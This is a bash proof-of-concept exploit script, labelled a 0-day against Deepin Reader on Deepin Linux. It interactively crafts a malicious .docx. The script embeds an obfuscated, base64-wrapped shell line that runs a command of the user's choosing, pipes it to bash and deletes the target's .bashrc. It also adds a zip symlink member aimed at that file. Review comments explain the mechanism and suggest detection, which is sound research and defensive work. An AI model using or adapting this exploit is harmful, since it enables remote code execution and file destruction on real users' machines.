POC / deepin-reader_exploit.sh SH
#!/bin/bash

# Print the tool banner (ASCII art, the "0-day" tag, affected OS and author
# credit) to stdout. Takes no arguments and reads no globals.
myBanner(){
# Quoted delimiter: the art is emitted literally, with no expansion.
cat <<'BANNER'

╔╦╗┌─┐┌─┐┌─┐┬┌┐┌   ╦═╗┌─┐┌─┐┌┬┐┌─┐┬─┐  
 ║║├┤ ├┤ ├─┘││││───╠╦╝├┤ ├─┤ ││├┤ ├┬┘  
═╩╝└─┘└─┘┴  ┴┘└┘   ╩╚═└─┘┴ ┴─┴┘└─┘┴└─  
╦═╗╔═╗╔═╗  ╔═╗─┐ ┬┌─┐┬  ┌─┐┬┌┬┐        
╠╦╝║  ║╣   ║╣ ┌┴┬┘├─┘│  │ ││ │         
╩╚═╚═╝╚═╝  ╚═╝┴ └─┴  ┴─┘└─┘┴ ┴         
0-day

[Affected Operating System: Deepin Linux]
                                                    -by Febin (@febin_nj)          

BANNER
}

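# Verify that the pandoc converter is reachable on PATH before continuing.
# Arguments: none
# Outputs:   one status line on stdout
# Exits:     terminates the script with status 1 when pandoc is missing, so
#            a wrapper or CI job can tell the check failed
checkPandoc(){

# command -v is a shell builtin: the probe cannot itself be missing (unlike
# which), and nothing is word-split inside a test expression.
if command -v pandoc >/dev/null 2>&1
then
echo "[+] Pandoc is installed!"
else
echo "[-] Pandoc is not installed! Install pandoc to run this exploit.."
exit 1
fi
}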

# Interactive builder for the proof-of-concept document output/mal.docx.
# Prompts on stdin for a source text file, an account name and a command,
# converts the text to .docx with pandoc, then adds a symbolic-link member
# to the resulting archive.
#
# Globals written: html_file, username, cmd, b64cmd, payload (none is local).
# Side effects in the current directory: creates output/, overwrites
# out.html, creates and then deletes word/ (a pre-existing ./word directory
# is removed as well).
#
# Defensive reading: the artefact is an OOXML zip carrying a symlink member
# (word/temp.html) whose target is an absolute path under /home. A consumer
# that recreates symlink members on extraction and later writes through them
# can modify files outside its extraction directory. Rejecting symlink
# entries when unpacking is the usual mitigation, and a zip member with a
# symlink file type inside a .docx is a useful detection signal.
# NOTE(review): the reader-side behaviour that makes this exploitable is not
# shown in this file; confirm it against the vendor advisory.
mainProgram(){

printf "

[    This Exploit will craft a malicious document (.docx) from the specified TEXT file  and store the malicious docx under output/ directory ]

"
# Errors are discarded, so an already existing output/ is silently reused.
mkdir output 2>/dev/null

# NOTE(review): every read below lacks -r, so backslashes typed at the
# prompts are interpreted instead of being kept literally.
printf " [>] Path to your TEXT file (default = ./sample.txt): "
read html_file
# An empty answer falls back to ./sample.txt.
html_file=${html_file:-./sample.txt}

printf " [>] Enter the target username: "
read username

printf " [>] Enter the oneliner command to execute on target: "
read cmd

if [ -e "$html_file" ]
then
# Work on a copy; any existing ./out.html is overwritten.
cp "$html_file" out.html
else
echo "[-] The specified txt file doesn't exist!"
# NOTE(review): a bare exit returns the status of the echo above (0), so
# this failure is not visible to a calling script.
exit
fi

# base64-encode the typed command; the encoded form is embedded in the
# paragraph built below.
b64cmd=$(echo "$cmd"|base64)

# First paragraph of the document: text that reads as a shell command line.
# It decodes b64cmd with base64 -d, pipes the result to bash, removes
# /home/<username>/.bashrc and exits. Command names are written with
# backslashes between letters, and ${IFS} / ${NULL} appear where a space or
# nothing would normally be. Matching on plain command names will therefore
# miss this text, so detection is better keyed on the archive structure.
# username is interpolated into the path without validation.
payload="<p>/dev/null;\${IFS}c\l\e\a\r;echo\${IFS}${b64cmd}|b\a\s\e\${NULL}64\${IFS}-d|b\${NULL}a\s\h;r\m\${IFS}/home/${username}/.b\a\s\h\r\${NULL}c;e\x\i\t #</p>"
# Prepend the paragraph to the copied text. The substitutions are expanded
# before the redirection truncates out.html. $(printf '\n') expands to an
# empty string (trailing newlines are stripped), so only a space separates
# the paragraph from the original content.
echo "${payload}$(printf '\n') $(cat out.html)" > out.html

# Convert to OOXML; pandoc infers both formats from the file extensions.
pandoc out.html -o output/mal.docx
#pandoc output/mal.docx -o output/mal.html

rm -rf out.html
mkdir word 2>/dev/null

# Symlink named like a document part, pointing at the account's .bashrc.
# NOTE(review): ${username} is unquoted here, so whitespace or glob
# characters in the answer are word-split and expanded by the shell.
ln -s /home/${username}/.bashrc word/temp.html
# -u updates the existing archive; -y stores the link itself rather than
# the file it points to. This is the member defenders should look for.
zip -u -y output/mal.docx word/temp.html >/dev/null

# Removes the scratch directory, including a ./word directory that existed
# before the script ran.
rm -rf word/

echo "[+] Malicious document is written to: $(realpath output/mal.docx)"

}

# Entry point: show the banner, check for pandoc, then run the interactive
# builder. Each step is called with no arguments, in this order.
for step in myBanner checkPandoc mainProgram
do
"$step"
done